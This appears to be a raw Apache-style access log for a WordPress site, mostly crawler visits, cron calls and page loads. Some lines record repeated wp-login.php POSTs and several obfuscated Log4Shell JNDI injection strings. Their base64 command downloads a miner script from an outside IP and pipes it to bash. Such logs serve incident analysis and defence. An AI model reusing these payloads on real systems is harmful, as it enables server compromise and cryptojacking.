52.167.144.203 - - [06/Sep/2025:06:48:21 +0800] "GET /logistics/ HTTP/1.1" 200 22410 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [06/Sep/2025:06:50:55 +0800] "POST /wp-cron.php?doing_wp_cron=1757112655.3497059345245361328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.127.245.162 - - [06/Sep/2025:06:50:55 +0800] "POST /wp-login.php HTTP/1.1" 200 9111 "-" "Mozilla/5.0"
36.133.115.36 - - [06/Sep/2025:06:52:17 +0800] "POST /wp-cron.php?doing_wp_cron=1757112737.6103088855743408203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [06/Sep/2025:06:52:17 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [06/Sep/2025:06:53:24 +0800] "POST /wp-cron.php?doing_wp_cron=1757112804.8199050426483154296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [06/Sep/2025:06:53:25 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [06/Sep/2025:07:06:57 +0800] "POST /wp-cron.php?doing_wp_cron=1757113617.5248401165008544921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.127.245.162 - - [06/Sep/2025:07:06:57 +0800] "POST /wp-login.php HTTP/1.1" 200 9114 "-" "Mozilla/5.0"
36.133.115.36 - - [06/Sep/2025:07:11:21 +0800] "POST /wp-cron.php?doing_wp_cron=1757113881.8772718906402587890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.253 - - [06/Sep/2025:07:11:22 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
145.220.91.19 - - [06/Sep/2025:07:12:29 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0"
36.133.115.36 - - [06/Sep/2025:07:24:51 +0800] "POST /wp-cron.php?doing_wp_cron=1757114691.2965600490570068359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
117.33.163.216 - - [06/Sep/2025:07:24:51 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
117.33.163.216 - - [06/Sep/2025:07:24:58 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
93.123.109.122 - - [06/Sep/2025:07:25:17 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:138.0) Gecko/20100101 Firefox/138.0"
93.123.109.122 - - [06/Sep/2025:07:25:17 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:138.0) Gecko/20100101 Firefox/138.0"
93.123.109.122 - - [06/Sep/2025:07:25:18 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:138.0) Gecko/20100101 Firefox/138.0"
93.123.109.122 - - [06/Sep/2025:07:25:18 +0800] "GET / HTTP/1.1" 200 39369 "http://www.cqqizhou.com:80/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:138.0) Gecko/20100101 Firefox/138.0"
93.123.109.122 - - [06/Sep/2025:07:25:19 +0800] "GET / HTTP/1.1" 200 39369 "http://36.133.115.36:80/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:138.0) Gecko/20100101 Firefox/138.0"
36.133.115.36 - - [06/Sep/2025:07:25:54 +0800] "POST /wp-cron.php?doing_wp_cron=1757114754.4715769290924072265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [06/Sep/2025:07:25:54 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
80.75.212.83 - - [06/Sep/2025:07:26:04 +0800] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==%7D%27%29 HTTP/1.1" 301 5 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')"
80.75.212.83 - - [06/Sep/2025:07:26:04 +0800] "GET /t%28%27%7B%7Benv:NaN:-j%7Dndi%7Benv:NaN:-:%7D%7Benv:NaN:-l%7Ddap%7Benv:NaN:-:%7D/46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw== HTTP/1.1" 404 31381 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}')"
80.75.212.83 - - [06/Sep/2025:07:26:05 +0800] "GET /$%7B$%7Bupper::-j%7D$%7Bupper::-n%7D$%7B::-d%7D$%7Bupper::-i%7D:$%7Bupper::-l%7D$%7Bupper::-d%7D$%7Bupper::-a%7D$%7Bupper::-p%7D://46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==%7D HTTP/1.1" 301 5 "${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}" "${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}"
80.75.212.83 - - [06/Sep/2025:07:26:06 +0800] "GET /%7B%7Bupper::-j%7D%7Bupper::-n%7D%7B::-d%7D%7Bupper::-i%7D:%7Bupper::-l%7D%7Bupper::-d%7D%7Bupper::-a%7D%7Bupper::-p%7D:/46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw== HTTP/1.1" 404 31381 "${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}" "${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::-p}://46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}"
80.75.212.83 - - [06/Sep/2025:07:26:07 +0800] "GET /$%7B$%7B::-j%7D$%7B::-n%7D$%7B::-d%7D$%7B::-i%7D:$%7B::-l%7D$%7B::-d%7D$%7B::-a%7D$%7B::-p%7D://46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==%7D HTTP/1.1" 301 5 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}"
80.75.212.83 - - [06/Sep/2025:07:26:08 +0800] "GET /%7B%7B::-j%7D%7B::-n%7D%7B::-d%7D%7B::-i%7D:%7B::-l%7D%7B::-d%7D%7B::-a%7D%7B::-p%7D:/46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw== HTTP/1.1" 404 31381 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==}"
80.75.212.83 - - [06/Sep/2025:07:26:09 +0800] "GET /$%7B$%7B::-j%7D$%7B::-n%7D$%7B::-d%7D$%7B::-i%7D:$%7B::-l%7D$%7B::-d%7D$%7B::-a%7D$%7B::-p%7D://46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw== HTTP/1.1" 301 5 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw=="
80.75.212.83 - - [06/Sep/2025:07:26:10 +0800] "GET /%7B%7B::-j%7D%7B::-n%7D%7B::-d%7D%7B::-i%7D:%7B::-l%7D%7B::-d%7D%7B::-a%7D%7B::-p%7D:/46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw== HTTP/1.1" 404 31381 "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw==" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://46.8.231.224:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vNDYuOC4yMzEuMjI0L3NjcmlwdHMvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1zOyB3Z2V0IC1xTy0gaHR0cDovLzQ2LjguMjMxLjIyNC9zY3JpcHRzLzR0aGVwb29sX21pbmVyLnNoIHwgYmFzaCAtcw=="
36.133.115.36 - - [06/Sep/2025:07:31:15 +0800] "POST /wp-cron.php?doing_wp_cron=1757115075.8287119865417480468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.127.245.162 - - [06/Sep/2025:07:31:15 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
36.133.115.36 - - [06/Sep/2025:07:34:16 +0800] "POST /wp-cron.php?doing_wp_cron=1757115256.7842469215393066406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
217.182.158.226 - - [06/Sep/2025:07:34:16 +0800] "GET /wp-login.php HTTP/1.1" 200 2780 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
217.182.158.226 - - [06/Sep/2025:07:34:23 +0800] "POST /wp-login.php HTTP/1.1" 200 2976 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [06/Sep/2025:07:38:58 +0800] "POST /wp-cron.php?doing_wp_cron=1757115538.1347379684448242187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.139.177 - - [06/Sep/2025:07:38:58 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [06/Sep/2025:07:42:15 +0800] "POST /wp-cron.php?doing_wp_cron=1757115735.0293869972229003906250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
91.224.92.17 - - [06/Sep/2025:07:42:34 +0800] "GET / HTTP/1.1" 200 96805 "-" "-"
36.133.115.36 - - [06/Sep/2025:07:51:06 +0800] "POST /wp-cron.php?doing_wp_cron=1757116266.4122679233551025390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.50.103.48 - - [06/Sep/2025:07:51:06 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.135.193.100 - - [06/Sep/2025:07:51:12 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [06/Sep/2025:08:05:26 +0800] "POST /wp-cron.php?doing_wp_cron=1757117126.5732629299163818359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.127.245.162 - - [06/Sep/2025:08:05:26 +0800] "POST /wp-login.php HTTP/1.1" 200 9111 "-" "Mozilla/5.0"
36.133.115.36 - - [06/Sep/2025:08:06:43 +0800] "POST /wp-cron.php?doing_wp_cron=1757117203.9435369968414306640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.163.1.211 - - [06/Sep/2025:08:06:43 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [06/Sep/2025:08:16:22 +0800] "POST /wp-cron.php?doing_wp_cron=1757117782.7002739906311035156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
217.113.194.117 - - [06/Sep/2025:08:16:22 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
217.113.194.116 - - [06/Sep/2025:08:16:40 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (compatible; Barkrowler/0.9; +https://babbar.tech/crawler)"
36.133.115.36 - - [06/Sep/2025:08:21:16 +0800] "POST /wp-cron.php?doing_wp_cron=1757118076.1470339298248291015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.127.245.162 - - [06/Sep/2025:08:21:16 +0800] "POST /wp-login.php HTTP/1.1" 200 9114 "-" "Mozilla/5.0"
185.137.235.119 - - [06/Sep/2025:08:21:37 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
185.137.235.119 - - [06/Sep/2025:08:21:39 +0800] "POST /wp-login.php HTTP/1.1" 200 2974 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
36.133.115.36 - - [06/Sep/2025:08:21:49 +0800] "POST /wp-cron.php?doing_wp_cron=1757118109.1006278991699218750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [06/Sep/2025:08:21:49 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [06/Sep/2025:08:45:06 +0800] "POST /wp-cron.php?doing_wp_cron=1757119506.0217249393463134765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.127.245.162 - - [06/Sep/2025:08:45:06 +0800] "POST /wp-login.php HTTP/1.1" 200 9110 "-" "Mozilla/5.0"
123.57.13.121 - - [06/Sep/2025:08:49:00 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
36.133.115.36 - - [06/Sep/2025:08:52:50 +0800] "POST /wp-cron.php?doing_wp_cron=1757119970.0319879055023193359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [06/Sep/2025:08:52:50 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [06/Sep/2025:09:05:55 +0800] "POST /wp-cron.php?doing_wp_cron=1757120755.8047449588775634765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
112.196.0.228 - - [06/Sep/2025:09:05:58 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
112.196.0.228 - - [06/Sep/2025:09:06:00 +0800] "POST /wp-login.php HTTP/1.1" 200 2978 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0"
91.224.92.17 - - [06/Sep/2025:09:06:15 +0800] "GET / HTTP/1.1" 200 109837 "-" "-"
42.236.17.219 - - [06/Sep/2025:09:15:01 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [06/Sep/2025:09:15:12 +0800] "POST /wp-cron.php?doing_wp_cron=1757121312.3553719520568847656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.17.219 - - [06/Sep/2025:09:15:12 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
42.236.17.246 - - [06/Sep/2025:09:15:16 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
42.236.17.246 - - [06/Sep/2025:09:15:19 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [06/Sep/2025:09:19:31 +0800] "POST /wp-cron.php?doing_wp_cron=1757121571.2529559135437011718750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
121.127.245.162 - - [06/Sep/2025:09:19:31 +0800] "POST /wp-login.php HTTP/1.1" 200 9111 "-" "Mozilla/5.0"
36.133.115.36 - - [06/Sep/2025:09:21:25 +0800] "POST /wp-cron.php?doing_wp_cron=1757121685.9004759788513183593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.100 - - [06/Sep/2025:09:21:26 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [06/Sep/2025:09:29:52 +0800] "POST /wp-cron.php?doing_wp_cron=1757122192.0472679138183593750000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.135.193.253 - - [06/Sep/2025:09:29:52 +0800] "GET / HTTP/1.1" 200 151919 "-" "-"
52.167.144.232 - - [06/Sep/2025:09:43:11 +0800] "GET /wp-content/uploads/2025/07/1750671805-partner4_200x50.webp HTTP/1.1" 200 2390 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [06/Sep/2025:09:43:51 +0800] "POST /wp-cron.php?doing_wp_cron=1757123031.8533089160919189453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
